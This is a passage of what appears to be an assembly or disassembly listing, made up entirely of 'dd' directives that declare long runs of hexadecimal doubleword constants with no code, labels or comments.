		dd 0BD6018B4h, 27221C0h, 4200B5h, 354DF02Ah, 6048A9F3h
		dd 97B7F655h, 0F268A77Eh, 7BC40E59h, 0D1C5BD41h, 32FB79E4h
		dd 3C56EBBCh, 9C705B2Dh, 0A5561899h, 330BEFAFh,	76B65C91h
		dd 0F4D65C60h, 0FD4824EBh, 92FF396h, 65B23341h,	571FF20Ch
		dd 56B3999Fh, 0BB6AA61Ch, 0C264D4A9h, 2D5EA80Bh, 8F31FB59h
		dd 0A5D4BAC3h, 858D2D98h, 0F73ED18Eh, 0FF386E2Ch, 823841ACh
		dd 6F7BFB3Fh, 9625F44Eh, 94F2892Ah, 123EE062h, 1F393FCDh
		dd 31F523E3h, 731E6A83h, 33D7945Fh, 0FCDCFCB8h,	0AE4548CBh
		dd 13E5331Bh, 6950CEB2h, 942C7914h, 555889C4h, 28F84F05h
		dd 0A2C13446h, 1BDCDDD3h, 5EE578B9h, 0CC19FE03h, 862AD38Ch
		dd 3FF5DC7Fh, 0F6189815h, 0FD44B771h, 0D1EED279h, 0E5CBA240h
		dd 2C8303FCh, 139622A9h, 49532264h, 8A2E2E53h, 0E309763Bh
		dd 4B44417Dh, 0A4002D50h, 9B0A432Eh, 5FE35702h,	22A48950h
		dd 0CA6CD658h, 10300843h, 8182163Bh, 45711D38h,	4DF3E58h
		dd 0E80F7F87h, 7C9BE0Fh, 31EE9915h, 9059796Ah, 40EFCA19h
		dd 122F5A50h, 0C06C0990h, 0F8D2CE3Ah, 0D7CFFC4Eh, 2C764845h
		dd 0A9CE8ABh, 3E4E1908h, 88C0BAD3h, 82EB269Bh, 0BC865F45h
		dd 82E9112Fh, 13548354h, 0C21F371Ah, 25A9F5Ch, 5F20BEC2h
		dd 0B8BEA5E0h, 1096C939h, 987962C4h, 18C0405Ch,	0AAE0282Bh
		dd 4A29A894h, 22ED1822h, 0CCD7B9DFh, 88369BF5h,	0B0829221h
		dd 0FE2A6CB1h, 0BBD39AC6h, 82DC733Ch, 0C46CCBEh, 0B0721A1Fh
		dd 28F1382Ch, 341B58A3h, 3AA1574h, 9157FF05h, 0E59198D0h
		dd 12D153B2h, 50998181h, 8A2B8C83h, 8E050478h, 558431F6h
		dd 416A2984h, 0AC495982h, 45972F6Bh, 7D29653Dh,	6296B307h
		dd 0E04008B9h, 0B6E2585Ch, 72C896E6h, 8E592CB1h, 0D2FB9B8h
		dd 0D18308BBh, 0E35E2C8Dh, 76F56D19h, 10190DBCh, 0F7A2D1AFh
		dd 2D1208Ch, 0FE2EE9B5h
		dd 0CA145C56h, 0F814D818h, 0A1F88DC5h, 198D0AC0h, 0DC707A7Ch
		dd 4B140BF0h, 0AA28A194h, 0E2928ED6h, 0F7F8C54Fh, 9E904101h
		dd 0FF8E92EFh, 54D4EBB7h, 67CFDC32h, 32438C4Bh,	137656C1h
		dd 7F82925Fh, 6353B0Fh,	0A23794BAh, 0AA3E2F9Eh,	649279E0h
		dd 0A127882Ah, 0D6B48411h, 0F628D535h, 0A9965CFh, 0CFF989C0h
		dd 0FA53C135h, 0F84C474Fh, 0DAA96E21h, 5B80F092h, 0ECE318D7h
		dd 0AA414531h, 8E282E95h, 0E9445682h, 43C71081h, 59D4A160h
		dd 58AF4A06h, 0DC5761D1h, 90059FC8h, 0B4E70962h, 0BD061890h
		dd 0A25B2403h, 1575066Eh, 0B7B08880h, 0F7129181h, 0D0269020h
		dd 623C8084h, 0BE8EF818h, 0F065409Dh, 0B4A0117Ch, 5F857B77h
		dd 808E0BC7h, 0C0D92481h, 6C04FA60h, 8114F846h,	9A392B6Ah
		dd 3180AF3Fh, 2A5868A8h, 13B4DC42h, 0F9F76C4Bh,	3630752Dh
		dd 0E5A919A5h, 0C91346ECh, 0B0F2A2A0h, 8DEC058Ch, 0A88D72AFh
		dd 8F1EAAE6h, 2E240D5h,	53A8E8D0h, 0AEACF843h, 41CA4947h
		dd 212F93B5h, 9EF8825Eh, 32E99F0h, 51173AC0h, 0D831B456h
		dd 0C5784F52h, 431BF99Ah, 4AEBE44Dh, 8F5CBDB4h,	66CE1757h
		dd 0FDEB5F0Ah, 5A372E8Eh, 62B8FCEh, 308DAEB2h, 2640E077h
		dd 0FDA5C7C2h, 0CCCE828Dh, 0B045461Bh, 0FF9AFBF4h, 7C3C73BEh
		dd 73EE1625h, 2E8ED181h, 863597Eh, 0B4360F82h, 8BAC7108h
		dd 0F1C68A06h, 120B404Bh, 6572349Ch, 0D286D02h,	3224DAFEh
		dd 0C1EAA7C8h, 5A367D4h, 6C8C3B45h, 5F2720FBh, 0CE2CA126h
		dd 857C5D8h, 135CCB16h,	61BE0110h, 0C0816CF2h, 0C1F0FE59h
		dd 415244A4h, 61220FAh,	0A2CC5310h, 0D30C38ECh,	98C08691h
		dd 0A1DF8FB2h, 9258CC6Ch, 1E4B8C5Eh, 80CF1B82h,	0D230D23h
		dd 0EF970245h, 0F9568AA2h, 49C5B73h, 84357452h,	47CD0624h
		dd 759473ADh, 9C726347h, 0A1105E6Eh, 1E512C4Ah,	0AEC03798h
		dd 0CECE4A59h, 6E41FAF7h, 0B3EBBE4Fh, 498C2400h, 0D23D8BABh
		dd 0DD7030A7h, 172B7F58h, 55E32096h, 432D7E89h,	3BE95C5Fh
		dd 0D1222ACAh, 0D5F46D75h, 387A247h, 0F2CDF8C6h, 4AE20090h
		dd 8FD2CA2Bh, 1A43F934h, 0CCA5C8FBh, 25C5B5BCh,	1F206431h
		dd 662E2A50h, 55043759h, 30021B88h, 33702A19h, 18D84920h
		dd 0A3070DB0h, 8669DA21h, 5C68A109h, 3D2210CFh,	80AC339Ah
		dd 454176A8h, 9B4231EAh, 0F91F7DFDh, 1BE9375h, 0AECE0689h
		dd 30BD3D0Ah, 681ABE76h, 61E1B622h, 0FDF75577h,	897E482Bh
		dd 0C5088BA0h, 630AD42Dh, 3867B193h, 37D8AB8Dh,	0B20B602h
		dd 9DC83762h, 6582427h,	9D9A6C60h, 61569D20h, 0FEC5E317h
		dd 8EFE2FE5h, 31D16FF5h, 0B83BC082h, 0DF457B3Ch, 74A11C61h
		dd 32290862h, 2076C700h, 0C288D29h, 701AEF78h, 775C77Dh
		dd 0A0ED06A2h, 1677FDDAh, 14441706h, 596C68C3h,	911370E3h
		dd 60173C98h, 0B2875F73h, 431002C0h, 90110138h,	0CD410A93h
		dd 15919D01h, 4658F869h, 5A57091h, 2B442AEh, 1D0A220Ah
		dd 0E235B81Fh, 80466282h, 0D5C75854h, 2BD1A804h, 85A1F967h
		dd 205AF69Ch, 0BE31E1BBh, 0CE5B6C0Bh, 50FC81A1h, 3A2D9120h
		dd 6266AD8h, 0A23CD10Eh, 0B282E220h, 573192C5h,	49E28953h
		dd 28B5CE03h, 0C396B98Dh, 0C535C257h, 0A812C044h, 0DE57406Ch
		dd 0C2E55020h, 91BB28B9h, 0FDFFBCA8h, 20247A3h,	17A9ED4Ah
		dd 2AA8C8FEh, 48A13D81h, 342CA64Ch, 5A1EA5CEh, 0AEC7E36Ah
		dd 0FD418D25h, 34D01F59h, 16C5B2h, 0AFB2EB8h, 9E8C0050h
		dd 0C118AD69h, 11168CB1h, 0A4C955C2h, 638F610Eh, 709C381h
		dd 3BB7F3DEh, 10E21775h, 32CE386Ch, 9B02DDC3h, 3C489EBEh
		dd 8A55D956h, 52BB0D66h, 120A0D50h, 0C45AC593h,	9AB4EBE7h
		dd 0E5362C8Dh, 0A2DE316Fh, 0B6D68DEAh, 7D476AD8h, 238AD965h
		dd 626ECACEh, 9659637Eh, 0CD12ED63h, 47BAE947h,	334EA90Dh
		dd 933B90C5h, 1C6E7C4Ah, 357C404h, 2F21D7C0h, 14E2DDA3h
		dd 62F06DEFh, 8D518197h, 0D29AABB5h, 12037318h,	0EC95471Fh
		dd 0B91488AEh, 146C0670h, 0E26B6C61h, 6CD9A00Eh, 0B003B900h
		dd 5F7680C6h, 6CA3350Ah, 0D8D1DD7Ah, 0D17B4C88h, 44B5B653h
		dd 0BB4EB10Ch, 1E9A7E94h, 0D5A443A5h, 329A40C2h, 22B76FA0h
		dd 8743CA80h, 2897130h,	480D80FAh, 7AC9BD54h, 69B88E2Eh
		dd 4CE42263h, 30B44C49h, 81F4E63Bh, 63B80F36h, 70D9F7DAh
		dd 0E6AA0420h, 0BBC1547Fh, 3951C536h, 190877CCh, 0CE110B8Eh
		dd 798164D2h, 98515C7Ch, 0C7DE1173h, 0BC36D900h, 451DC445h
		dd 573C24A5h, 0C40A60E2h, 0D80C9358h, 3BA46C57h, 0F598277Ch
		dd 4FFF64B4h, 62C0B0BCh, 4C245D0h, 0E631331Bh, 7AD78ED4h
		dd 515075C3h, 540BB093h, 0C5120B57h, 0B2BC262Fh, 0FC29ACDAh
		dd 57418B7Fh, 9614AB06h, 2C088B5h, 76DCEFEBh, 0E81A76B2h
		dd 3B673448h, 7C1B090h,	632C2673h, 0FC2C824Eh, 0D3D779D0h
		dd 62E31DAAh, 6E764663h, 16BA5176h, 345A4543h, 295A0AAh
		dd 261BE462h, 168A1768h, 0A11A5E01h, 8AB43660h,	0B78C2779h
		dd 185D8132h, 825ADD8Dh, 4B95BF03h, 0BCD15020h,	3AB2AECBh
		dd 1E0D6188h, 0A223B843h, 0C7D4ABEFh, 3D916AC1h, 59F8F5C5h
		dd 0A76EF8A3h, 84AC494Bh, 8CA8D198h, 69227090h,	68A9F32Eh
		dd 0D380AEDCh, 8AA28525h, 0D735B979h, 2977A571h, 4AB3488h
		dd 3A9F3583h, 7097F180h, 4775F535h, 7803AD10h, 0C035A2ECh
		dd 0E25B5A67h, 0C6EF850Eh, 6ADC501Ah, 1B8D7909h, 623A488h
		dd 3240C9DEh, 0CFC680D0h, 12B57A1Ch, 5AC7D678h,	0EF7A4044h
		dd 54530EC5h, 4DF40EEFh, 4C718701h, 830C700Dh, 548704Ah
		dd 28F2C38Bh, 0F9E24C69h, 412D24B9h, 881CE01Ah,	25AB531Dh
		dd 0FD217218h, 0E05408A6h, 0D088C005h, 185DA824h, 0F291E85Ch
		dd 166C482Dh, 231C9DBh,	782DBEDDh, 283B3F8Ch, 23A7848Bh
		dd 0CBE505Ah, 0C535163Bh, 0FE7C8FCBh, 6B409A5h,	2E7A0502h
		dd 0BD0C6721h, 0C3F33E3Bh, 0A9C6B470h, 295AE48Ah, 5FBBB30Eh
		dd 6707A8D6h, 4ABB5C74h, 3405CEDDh, 8A8404DEh, 0A721776Dh
		dd 587A072Ah, 44FFA521h, 328C6B54h, 9517D99Fh, 0D83A0198h
		dd 4A1E1474h, 91D90995h, 5344F862h, 6A14EB15h, 72A2BCECh
		dd 2BB2C924h, 6607E34Ch, 0D458CA2Dh, 9014DD37h,	0AA2A8F28h
		dd 2DCF6256h, 0D845D38Ch, 2556D28Ah, 665854B8h,	0D96E32A0h
		dd 726F4005h, 8655F077h, 5AEF9D37h, 18CA674Ah, 0FBDD981Eh
		dd 635DC9C0h, 8418302Ch, 89E3FC5Eh, 4410949Eh, 2D42CEE2h
		dd 7D535567h, 4A0A6831h, 7B2A1512h, 97EBAACEh, 92D5B387h
		dd 56C7A05Fh, 43A98030h, 45142A0Ch, 871053B5h, 3A009D91h
		dd 975D3C4Eh, 50494CD0h, 3352276Ah, 771A05A0h, 7BEF8CFEh
		dd 0B931EB26h, 68A78F3Bh, 563F0225h, 87946F55h,	1BF7A7FBh
		dd 62E7A5E3h, 0FC4692C4h, 0C5AF1F7Bh, 3C993474h, 6B818D2Ah
		dd 91A12B3Ah, 82393451h, 45CD8F8Eh, 7BE6AB16h, 486959AAh
		dd 6917DF67h, 1D3845CAh, 7F32B857h, 0E3A7FD27h,	37E8D5DFh
		dd 4A3D1C54h, 412ED8C8h, 341439ACh, 0C340909Eh,	4C9D5F85h
		dd 689DCEEEh, 0D3439DCh, 0B7254F04h, 7565EE3Ah,	0E65D422Ah
		dd 2F2B70BCh, 9B7BE640h, 0DC5EBBC1h, 1D481CC5h,	51CC24D8h
		dd 9EC5A284h, 0B2B36BBBh, 5F20708Fh, 2F111E09h,	0B0C872DAh
		dd 7C206A12h, 2B3CA026h, 0D3842F98h, 0F26D9928h, 3B3B7EA2h
		dd 37C13272h, 4F6078Ah,	0D413DB28h, 85531079h, 8151B0FBh
		dd 0D0642C8Ah, 0FACB5C5Dh
		dd 18E932F5h, 0C99BE9Fh, 0FB6C462Dh, 0C3C6FDA1h, 0ED1724D1h
		dd 2DBFA855h, 579CC1E1h, 5E7D570Ah, 9431E7B4h, 3367C36Eh
		dd 68337CE6h, 0AA647920h, 0FB39648Bh, 0A02A29Fh, 9AAB5E74h
		dd 44498AC0h, 0E15FD5D3h, 26089DDCh, 1023E93Dh,	0E3F701A3h
		dd 91866C0Ch, 5724352Ch, 2CB1A551h, 0CDAB84A8h,	0C887D1C6h
		dd 384C2789h, 0A3D5A20Dh, 0B5D60F4Ah, 0A25AD85Fh, 5A1324C0h
		dd 0E4C03590h, 0DD44DCBDh, 0DB683024h, 0D4A89EF2h, 1E17AB93h
		dd 0A9031168h, 0FAE0483Ah, 46550508h, 96D08D9Eh, 0C1895B49h
		dd 7FFAA9EDh, 86E76C90h, 5BB3ED18h, 6AFB38C0h, 0C071022Ch
		dd 0CA9C072Eh, 0CEFCBB6Fh, 498E700h, 76740A8Ch,	0F7DFB5BFh
		dd 0F139638Ah, 42AEFCC6h, 0B5713C9h, 4206328h, 250F50EEh
		dd 0DC4E5D96h, 0B450C761h, 0CD1A54DCh, 0D9889F7Fh, 27E076C0h
		dd 0F17ACA4Dh, 0FC633B7Ch, 2EBCECFFh, 1D1C0A64h, 22E8AADEh
		dd 8B70A818h, 6864F939h, 0F6FA5A65h, 4328C6AAh,	761F8A8Bh
		dd 0B5A9F5A1h, 60F8542h, 2340D75Eh, 2D8778C5h, 0CB715DF2h
		dd 4C714717h, 303ABF2Ah, 1BFE0C6Ch, 19948CF1h, 89E83D87h
		dd 0FC4925BEh, 5710A87Fh, 9A029ED9h, 4BD5E7C5h,	0B9430EDAh
		dd 92D003EAh, 105F66E7h, 0B318AE4Ah, 0AA4266C2h, 70E42968h
		dd 0F2B30271h, 2E04230Ch, 0D3D811B5h, 4219010h,	895D956Bh
		dd 66251A68h, 0C4B75622h, 354252AEh, 0AAE34604h, 44944AADh
		dd 768A8ED1h, 0AB9D0105h, 5B2CAC82h, 0B38A6360h, 205C893Ah
		dd 0BC473C4Ch, 0B187D8CEh, 68112815h, 88823856h, 32A7144Fh
		dd 354EAF07h, 60894690h, 0C103D5E5h, 6882017Ah,	5C2965EDh
		dd 23805535h, 471E9010h, 6AEAE364h, 148000FBh, 311C5529h
		dd 0CC36B4EDh, 0A67D5DF4h, 0A3ED92B4h, 0FD7E2DCFh, 70A5FFF2h
		dd 0D3F42AAEh, 7EDCD606h, 0A8CDAFF5h, 6B8011D4h, 0DC9AA28Bh
		dd 0C82EA6D5h, 2CA95330h, 0A4814F11h, 5B763200h, 0F1C36E0Ah
		dd 0CE026C06h, 38CE0855h, 280CD8A5h, 0D2803BE8h, 6FB3A775h
		dd 0F0C5CDC2h, 25560A85h, 0A2897A5Dh, 1E888EA0h, 0C083B555h
		dd 5A2F3697h, 0EB64C0D3h, 0F5811Bh, 564D0F8h, 1C9742D5h
		dd 0EC0FC62h, 0F658BD07h, 1090F63Ah, 33665A21h,	0C4257198h
		dd 2B2CA5A0h, 53D7A407h, 4F022CF4h, 62A021B4h, 2C61BA0Ah
		dd 97D5C119h, 754DF366h, 11012B90h, 0DAA7B52h, 688B55A7h
		dd 778F0BB0h, 2E2C0F48h, 6BF806FAh, 0DAA18627h,	0B3B954D2h
		dd 0CA827B57h, 72AF9C24h, 0AA40754Bh, 3AAA6B83h, 0E35794CAh
		dd 3694CFE2h, 0D0F5D4B1h, 0D19F24AEh, 995C5777h, 0B4114E16h
		dd 0F46EFC9h, 0C8336C21h, 8DBEDE11h, 0DE8AAAD5h, 0B241BC44h
		dd 0B349D157h, 0AE9E5711h, 474BBF81h, 43196A32h, 0F14160CAh
		dd 89C3434h, 32EB476h, 69D148D3h, 0E5AA4560h, 3958C348h
		dd 334CFE0Dh, 2C831271h, 0AA2B19B9h, 3CF12B73h,	8CCC9F9Ah
		dd 51829027h, 198978C5h, 20BF84B4h, 0AC49B8C5h,	79763C5Fh
		dd 821E5BA3h, 6B4586D4h, 0A7040615h, 0C37448E1h, 6D159476h
		dd 450A5740h, 0B9647B7h, 0ACC2A723h, 81B73AC7h,	8221D14h
		dd 0CC0ECCD2h, 0A68AA076h, 369A526h, 50AE8B08h,	1181B9C3h
		dd 814E68C4h, 6898E0AAh, 3E4D4620h, 5FCCC55Ah, 0EBF2F661h
		dd 0A2F37825h, 124F3124h, 48938CF3h, 0D75B8ABBh, 524112DBh
		dd 49D873D2h, 6BD15143h, 57BED576h, 4329A5E4h, 6AA6E5Ch
		dd 51965F1Eh, 41485D66h, 0B8A80C94h, 2FBBBBCh, 61B9A9FAh
		dd 588B0563h, 28DF88D7h, 0E90391D3h, 59BD229Bh,	3284B977h
		dd 8648CC22h, 0D67F22CFh, 23D60995h, 3D5514B2h,	929AA9C3h
		dd 2BE37113h, 708B5AA0h, 0E145F045h, 8C2824F4h,	0C444712Bh
		dd 1D93AD68h, 0CE22C8ABh, 0DF60C25Ah, 41569541h, 0C3CCEACEh
		dd 333756F1h, 0C1B75953h, 4C5AD46Ch, 0A7997791h, 59E11045h
		dd 4BAF3C4h, 395B4825h,	46CE47D8h, 0F988A1AAh, 14962380h
		dd 56C08EF8h, 0B408D182h, 0FC72E3D1h, 6D14E635h, 0E8AE5153h
		dd 5374B692h, 49BF68A8h, 0E0B3BF51h, 90A0BD2Ch,	0C3F5BE91h
		dd 0DFA00601h, 48BC0768h, 9422A9DFh, 0F2E45D34h, 0C55C8CEEh
		dd 6ABACC4Eh, 208A6540h, 2C7141A7h, 290FBA69h, 0B31DE2E8h
		dd 0E9A955CAh, 0AA079DE6h, 1D0133A5h, 3CFEBE98h, 0E652CADCh
		dd 0C4541965h, 731F0032h, 0E79C1105h, 0C682B59Ah, 90109225h
		dd 0E010B192h, 57C24BD5h, 5C67BAFDh, 27E01A60h,	54BB4FB0h
		dd 0D7AF4D27h, 2D8AEE7h, 20E8044Ah, 0E87C5B4Dh,	0F133B8C4h
		dd 0E47C92D6h, 10CBFFAFh, 0BEC5CBF9h, 0A7EBF91Eh, 0E45B51DBh
		dd 0D197A0AFh, 0E5FCAF41h, 0ADA65641h, 0EED682D4h, 5FF3003Ah
		dd 13E1C34Bh, 0F9431445h, 42CFEF2Ch, 0C0EE590h,	6482A84Bh
		dd 924A1110h, 0C9837667h, 616FC3AEh, 0E1D95D3Ah, 62E22043h
		dd 3315E013h, 0E76DEFB3h, 8654B63Fh, 0E77B3178h, 0BCEF0189h
		dd 9134D31Eh, 0A60F27Dh, 0A8FDC5C3h, 0CB997E2Bh, 0C62A22FAh
		dd 11F5D022h, 1E9818E9h, 99DCB18h, 137183Bh, 0B57A40Bh
		dd 0A0A4DF84h, 49D25DC2h, 0BD8F4600h, 64C6E229h, 30834B2Dh
		dd 618A6C0Fh, 0F702B428h, 422556B1h, 91BBC6DCh,	81B60B49h
		dd 9A894535h, 7911F622h, 0C1145A2Ah, 575249C4h,	3EF227F0h
		dd 4E1F2218h, 79A8D130h, 13040EA2h, 0B9154533h,	386CE7EEh
		dd 50977981h, 0FD7C2479h, 0BAC5B04Bh, 60A145B6h, 8C6F2FC6h
		dd 196B040h, 1F0215A8h,	9F840BACh, 8A32101Dh, 618A5350h
		dd 8A949B8h, 28F8735h, 0E3F0904Eh, 39C9E276h, 4A62C17Bh
		dd 660D7306h, 4C519E12h, 184A7C94h, 6E026E23h, 47AB9C44h
		dd 0E513690Ch, 87930C1Dh, 3A62F6C3h, 3068FDAh, 245111CAh
		dd 0C860ABB1h, 46B9610Ah, 3E8DE4B4h, 8E8023FBh,	0FA54048Eh
		dd 0BE66FA96h, 580EF5CBh, 6FE2A4DEh, 1CAB9504h,	0B2A2531h
		dd 0B0095A28h, 0F1EEA6FAh, 0BAC64BCh, 7ED53C14h, 0A62291C7h
		dd 0C02E8070h, 39465511h, 88E0B630h, 181C112Ch,	95C41778h
		dd 0EBC4A408h, 0F071700Bh, 58116656h, 0F8309422h, 20E9C02Eh
		dd 0BA7151h, 62331747h,	0D88EA91Dh, 718181CAh, 89700175h
		dd 0BAC8CAA8h, 0DC834700h, 4700C0E5h, 0C0E52578h, 0BA23BB60h
		dd 0B860E044h, 225F805Dh, 2E2A72DEh, 0C38811C0h, 47006581h
		dd 0C0E58980h, 91E4BB08h, 0B600A83Eh, 563B700Bh, 0A356E7A1h
		dd 0A9FC9A0Dh, 28653FE0h, 2E237FA8h, 188211C0h,	0C7182061h
		dd 74217FC1h, 20898E01h, 0BA81CAh, 6A4D9047h, 0C491200Eh
		dd 5A06D08h, 74EE0273h,	57488D0Ah, 17311A08h, 0B6D3AD5Bh
		dd 0B4ACA8B4h, 0D75FB527h, 0FE75E2F9h, 5C06D7Bh, 8959A2DEh
		dd 17ACBC38h, 914AE1BFh, 311524C6h, 0F1D48265h,	63132988h
		dd 0AC470E2h, 0F1B1C693h, 4099D134h, 8B0646Eh, 0BFE24275h
		dd 800003BEh, 0D0000448h, 0E0000001h, 434A0041h, 6000h
		dd 0
		dd 20FA739Fh, 0FF1F375Bh, 4423BBDEh, 80864AECh,	8557EC85h
		dd 7B16877Fh, 1452367h,	0E050C8D7h, 6EE041A4h, 0E30204E2h
		dd 0C6852EFAh, 21A5A00h, 18743980h, 0C1AA9381h,	52BD802h
		dd 6EC4849h, 0BFA08188h, 0CA2000DBh, 1D401043h,	31E14199h
		dd 951542DAh, 2105882h,	1B7B9A13h, 0EAF21A60h, 0C1ED4980h
		dd 835D9401h, 0DCC610Bh, 3E40102Eh, 63832196h, 187F7C6h
		dd 22103F2Ah, 17768CA3h, 7D303095h, 0D9C142C8h,	0D217A64Fh
		dd 0FFF2C4B0h, 1C39A43h, 5B834207h, 0E9996B34h,	1F902082h
		dd 7801424Fh, 7F010A5Fh, 590C1FEDh, 8742D0Dh, 35501831h
		dd 9E14259Eh, 0D431B3E4h, 381A9421h, 72843DFBh,	80108791h
		dd 7184A14h, 0CD521BEEh, 0F0C06527h, 0C8718647h, 871C6A0Bh
		dd 101A34A4h, 33D43030h, 0B5588043h, 25B543CDh,	0ED090C17h
		dd 0B8042A9Dh, 0C42DF8D6h, 0ECBBE873h, 23E8692Ah, 40E1CB6Bh
		dd 0B763E3Dh, 4F303860h, 65AD2944h, 80438220h, 3C582217h
		dd 0DFFB564Ah, 12558C30h, 184A5AC2h, 9341C042h,	0B61230A8h
		dd 0AA1D0AFAh, 1E89EFFFh, 0CDCCDBA0h, 5F528486h, 3685C276h
		dd 8552D886h, 0FF6C874Eh, 40847BFEh, 2A126FC8h,	8614E04h
		dd 566B887h, 7CF0104Dh,	394021C3h, 830A0D61h, 0B3EC00Ch
		dd 3CB93436h, 0F402AA38h, 348806C0h, 12020230h,	24A06941h
		dd 12829160h, 17381D00h, 0E0F66640h, 429F910Eh,	0F15BC04h
		dd 2336B030h, 0BAF0C043h, 2F2C428Dh, 0F943E913h, 530323E0h
		dd 23204A42h, 0C7141804h, 60E94212h, 84A50A4Ah,	16943128h
		dd 6A50E4A1h, 0E9441288h, 0A5124A26h, 945128AAh, 5164A2E9h
		dd 46128CA5h, 1A4A3694h, 7128EA51h, 0E6A47B57h,	0CFA091E4h
		dd 8F9528h, 0F4108EAh, 5394AAA9h, 5C52C6A5h, 0A94B8A97h
		dd 852FEA51h, 9E8A1354h, 0AA2957D2h, 0BDA59749h, 80528933h
		dd 0A0287854h, 0C0429586h, 43DFAE43h, 0F3FD40EEh, 0DCAB1034h
		dd 2A34161Fh, 0BC330865h, 0AD873801h, 0AC561B24h, 80A5B095h
		dd 0BEC65AE9h, 692D6E04h, 0A648A84h, 46871009h,	39320A1h
		dd 31E2A5Bh, 7011D848h,	40C3D89Dh, 709021E6h, 95A65CEEh
		dd 972B4DBAh, 0CF202F6Fh, 24544500h, 90881A5Dh,	84F0B0A8h
		dd 30C570B7h, 9A302CFCh, 0D1BDCCh, 9960AA96h, 0B593B7DDh
		dd 0CA482CB7h, 8B194B83h, 3B8B3601h, 3899AB4h, 0E29F09FBh
		dd 424CE08h, 0C1430423h, 0E9FF83h, 91474C05h, 8EE76DF0h
		dd 40584788h, 2B1C2482h, 0B938CACh, 60B61470h, 23186010h
		dd 80C0A070h, 482C1A0Fh, 884C2A1h, 70C86C3Ah, 1F1088C4h
		dd 0A27148ACh, 5A2F188Ch, 0C6A371C8h, 0EC7A3F20h, 90C8A472h
		dd 492C9A4Fh, 2894CAA5h, 72C96CBAh, 5F3098CCh, 0A67349ACh
		dd 0DA6F389Ch, 0CEA773C9h, 0ECFA7F40h, 0A0D0A874h, 4A2D1A8Fh
		dd 48A4D2A9h, 74CA6D3Ah, 9F50A8D4h, 0AA754AADh,	5AAF58ACh
		dd 0D6AB75CAh, 0ED7ABF60h, 0B0D8AC76h, 4B2D9ACFh, 68B4DAADh
		dd 76CB6B7Bh, 170B8DC9h, 41A2EB76h, 0BBDE2F37h,	0ABDDF2FBh
		dd 7EBF919Eh, 0B46545B7h, 58EDE129h, 502AA189h,	742F7204h
		dd 1A5D16A5h, 4E294C99h, 0CCA5D442h, 0C494E46Bh, 2B103946h
		dd 0B65CCA19h, 364808AAh, 65EE9565h, 1C0BA819h,	0D1D1EA0Ah
		dd 9A681E52h, 851C8237h, 52278026h, 524410EDh, 0C7C1B0E2h
		dd 0DF0851C5h, 5A20A0D0h, 404E046h, 20945004h, 82A24D66h
		dd 46A014Fh, 209C19ACh,	2830119Bh, 0CC0955CDh, 28CB4809h
		dd 1D442D60h, 0B4130050h, 24BC5C09h, 802C2022h,	5C400B12h
		dd 48A00481h, 0F2C805BEh, 0E545BC29h, 0EE540BB4h, 1965B992h
		dd 40B6953h, 2090D604h,	0BAC83D04h, 4DA9324Fh, 448AAB54h
		dd 0A34B670Ch, 114C66D4h, 0CA2829D3h, 0A9343A7Dh, 100B2E57h
		dd 56E92D36h, 0DB2AC401h, 0A10826E5h, 690D8521h, 54A653EAh
		dd 64984803h, 0E2276934h, 0EA3A3CA1h, 214FA6D0h, 413184B2h
		dd 0A5369829h, 52012505h, 6662C370h, 256CB4ADh,	0BEC76D06h
		dd 2E656DA5h, 6C82D854h, 186E8A27h, 76E0556h, 0BB16BA1Ch
		dd 60CDA01h, 72864D9Fh,	10332C47h, 2C24EF26h, 4C29390Ah
		dd 829025D2h, 0D8765D0Ah, 0A8163420h, 80E00901h, 2064B140h
		dd 0CB65EE93h, 8B813BA8h, 1E05E034h, 8505B4B5h,	99AF62EDh
		dd 0F3088816h, 9B093973h, 57635061h, 2425B20Ah,	0B43B975h
		dd 171A6B6Ch, 94C1856Ah, 3ACCD945h, 0B4636D22h,	0B03A00C8h
		dd 72C4D021h, 0AB25D5C5h, 542825B7h, 6B2B1300h,	80E300E3h
		dd 917A17F8h, 55503081h, 42C8D269h, 650E9276h, 2BAD9C10h
		dd 4A5E6DE1h, 0D8D59A4Bh, 8F524730h, 2B5A802Ah,	400A96Bh
		dd 0B28BCB67h, 0A5C83516h, 200122DFh, 66178785h, 81B650AAh
		dd 694496A0h, 0D4C5A540h, 1428251h, 2F3862E5h, 2969F142h
		dd 90C89535h, 46585A55h, 0C34E7D97h, 506C6FD8h,	341DE88h
		dd 2514DB0Dh, 0A5BF31BEh, 1264896Eh, 0B78CE594h, 51A7CB4h
		dd 286C5C14h, 4E0E285Eh, 0CF444554h, 31D9430Dh,	2629F37Eh
		dd 2D6552F7h, 2A55451Ch, 300D1AD6h, 0EC15097h, 2820EE34h
		dd 0E284D104h, 0A9A81198h, 72C8C414h, 0CA7088DFh, 6586C56Ch
		dd 0B2B41FCDh, 40A0357h, 60514DDBh, 937AEF69h, 28A5C7CCh
		dd 71851359h, 4572C8C7h, 0FD3544Bh, 85D5BFABh, 0B5A4B5D0h
		dd 0C8442942h, 0E2994814h, 0E1453466h, 76AF856h, 1A72D897h
		dd 0A85300EBh, 6E8DC68Ch, 0C0D319CBh, 7C784EE0h, 60EA9D8Ch
		dd 50106C85h, 740EB16h,	74E13047h, 252C626h, 96450699h
		dd 0CAC7824Ah, 6E9F5B56h, 778762D1h, 720AC3ABh,	325AD8Ch
		dd 34506371h, 8D626D70h, 130BD28Ah, 79E39EBFh, 465C6EAh
		dd 0B00034CBh, 73552739h, 71B2604Ch, 59A438B5h,	0E0B3ACA7h
		dd 822DDF03h, 0A13B9A88h, 29772AE7h, 9AEE3624h,	4A729AC0h
		dd 88A5B415h, 96D020BAh, 5C8594Eh, 1358C94Bh, 3DD429AEh
		dd 6CB0D324h, 4B33D8A5h, 0D171CD80h, 60D077BDh,	0AF2D74C0h
		dd 94D6B20h, 6114AE2Ch,	0C0B15636h, 0DBCD4395h,	9250216Ah
		dd 63DDAC14h, 50A0B997h, 2119E5h, 0C02F2CE0h, 0A96D7360h
		dd 85BAAE5h, 934F8705h,	8CEA2A93h, 0E9210B8Ah, 831393A9h
		dd 2E3FE9Fh, 0BFB045Fh,	0F4CF0308h, 5205CA85h, 400D0712h
		dd 0A143C002h, 12A65861h, 395F2A4Dh, 0C4047E36h, 0A168A1Ah
		dd 9636B3F3h, 0FC70A3F6h, 0ED2C0582h, 2C0A91C1h, 622A4A97h
		dd 3224ED20h, 40A39164h, 0B306B280h, 7125C209h,	4292D26Ch
		dd 10AC212Ch, 0AB32D3h,	19835079h, 3FB087B0h, 49083002h
		dd 87659C04h, 828C3048h, 0A88C5DC8h, 0E0B73402h, 31C5EF83h
		dd 35B75EB8h, 6742C97Ah, 0D1E60155h, 54903016h,	0D28458EAh
